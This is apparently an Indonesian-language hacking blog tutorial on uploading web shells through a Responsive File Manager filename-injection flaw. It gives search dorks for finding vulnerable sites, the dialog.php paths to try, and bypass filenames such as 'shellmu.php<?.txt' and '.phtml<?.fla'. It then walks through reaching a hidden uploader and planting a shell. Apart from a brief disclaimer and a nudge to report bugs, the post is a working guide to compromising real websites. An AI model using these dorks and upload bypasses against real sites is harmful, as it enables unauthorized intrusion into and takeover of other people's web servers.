Exploit RFM inject filename to upload shell

 

Assalamualaikum wr. wb 

Welkombeck, jadi disini nzul akan membagikan sedikit cara & tips bagaimana cara upload shell dengan memanfaatkan bug file manager dengan cara inject file name. 

RFM singkatan dari Responsive file manager, yang dimana bug file manager nya kebuka kalo kita memasukkan Exploit di belakang site nya.

Yukk langsung saja masuk ke caranya

Sebelumnya siapkan dulu bahannya

Dork?

inurl://filemanager/dialog.php

inurl://assets/filemanager/ intext:"dialog.php"

inurl://js/filemanager/ intext:"dialog.php"

inurl://filemanager/dialog.php site:id 

note: Kebanyakan Site: yang Vuln Exploit RFM itu hanya hoki aja wkwkw, jadi ya ini buat sekedar sharing aja ygy.

Uploader yang ku pake :

Touch me senpai 

Nah selanjutnya kalo RFM site Vuln nya tuh kek gini, yaitu dengan menambahkan Exploit dibelakang site contoh: 

/assets/filemanager/dialog.php

/filemanager/dialog.php

Terus kali tekan titik 3

Lalu klik tanda panah ke atas

Lalu upload shell atau uploader dengan ekstensi

shellmu.php<?.txt

shellmu.php<?.jpg

shellmu.php.fla

uploadermu.phtml<?.fla

Nah kalo udah ada tanda centang berarti Shell/uploader nya udh ke up

Setelah itu tahan dan akan muncul,

Lalu tinggal klik'show url

Nah berarti cara akses shellnya 

site.com/assets/upload/images/nzul.php

Nah dikarenakan aku upload hidden uploader jadi tampilan nya kek gtu.

Tinggal kamu akses nzul.php?nzul7

Setelah itu udah deh tinggal kalian upload shell kalian

Boom, udah ke upshell

Ini tutorial hanya sebagai tips and trik

Jika anda melakukan untuk sebuah kejahatan itu bukan tanggung jawab saya hehe.

Sebaiknya kalo ada menemukan bug/celah di dalam website sebaiknya kalian report ya ges atau menutupi akses ke dalam web tersebut.

Mungkin segitu aja tutorial dari nzul

Semoga bermanfaat jangan lupa share ya adick"

Thanks to all my friends

#happyhacking #staystrong